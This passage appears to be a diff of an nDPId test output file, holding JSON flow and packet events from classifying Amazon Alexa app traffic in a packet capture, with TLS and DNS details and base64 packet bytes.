{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} 
00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -211,864 +211,864 @@ 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976043612,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 